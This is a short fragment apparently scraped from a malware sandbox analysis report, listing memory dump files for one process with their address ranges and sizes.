                                                                                                                                                                                                                                      • memory/3020-366-0x0000000000230000-0x000000000025F000-memory.dmp
                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                        188KB

                                                                                                                                                                                                                                      • memory/3020-367-0x0000000004884000-0x0000000004886000-memory.dmp
                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                        8KB

                                                                                                                                                                                                                                      • memory/3020-368-0x0000000000400000-0x000000000047F000-memory.dmp
                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                        508KB

                                                                                                                                                                                                                                      • memory/3020-370-0x0000000004881000-0x0000000004882000-memory.dmp
                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                        4KB